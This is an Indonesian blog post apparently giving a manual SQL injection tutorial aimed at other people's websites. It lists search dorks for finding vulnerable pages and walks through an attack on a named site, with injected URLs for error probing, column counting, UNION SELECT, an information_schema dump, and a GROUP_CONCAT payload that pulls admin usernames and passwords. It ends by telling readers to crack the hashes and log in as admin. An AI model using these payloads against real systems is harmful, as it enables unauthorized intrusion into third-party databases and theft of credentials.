Tutorial Menggunakan SQL Injection Manual

Sabtu, 29 Juni 2019 Tambah Komentar Edit

assalamualaikum warahmatullahi wabarakatu
Hai? apakabar? Sudah Lama Gw Ga Ngasih Tutorial nih
kali ini gw mau ngasih tutorial SQL injection.oke langsung ketutorialnya
Alat n  bahan:
1.pc/hp
2.koneksi internet, nebeng wifi jg oke. Awokwkwk
3.kesabaran

Step by step:
1. Paling pertama dorking cuk..

Dork:
-inurl:index.php?id=
-inurl:trainers.php?id=
-inurl:buy.php?category=
-inurl:article.php?ID=
-inurl:lay_old.php?id=
Dst..

>> Cari  web yg vuln..

 Untuk Mengetahui Vuln Atau Tidak kalean Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :

http://www.ilslbd.com/content.php?Id=4'

Nah spt itu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

jika sudah ketemu ,kalean tinggal masukan +order+by+1--+- ,Jadinya :

http://www.ilslbd.com/content.php?Id=4'+order+by+1--+-

Kalean terusin sampe nemu error ea..
http://www.ilslbd.com/content.php?Id=4'+order+by+2--+-
Ga error

http://www.ilslbd.com/content.php?Id=4'+order+by+3--+-
Ga error

http://www.ilslbd.com/content.php?Id=4'+order+by+4--+-
Error

Nah.. saya nemu error di nomor 4.
 Disini bza diketahui bahwa Table nya ada 3(angka sebelum error), Jika Sudah Gitu kalean Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2,3--+-

Dan booom!!! Kluar tuh angka togel
Gua disini dpet angka togel 3
Ok. Sekarang gua masukin injectnya.
Inject:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Jadi,

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+-

Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya.

Klo udah nemu..
Tinggal kalean dump.
Caranya Dengan Masukan Inject:
/!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)/

Disini user dan password gua di Table admin dan nama columnnya UserName dan Password. Jadi gua edit inject nya jadi

/!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])/

Nb: ganti tanda [] dg table yg lu temu cuk..

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, /!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])/--+-

Stelah nemu.. hash pw di hashkiller.co.uk
Dan cari admin login. Done

Belum ada Komentar untuk "Tutorial Menggunakan SQL Injection Manual"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel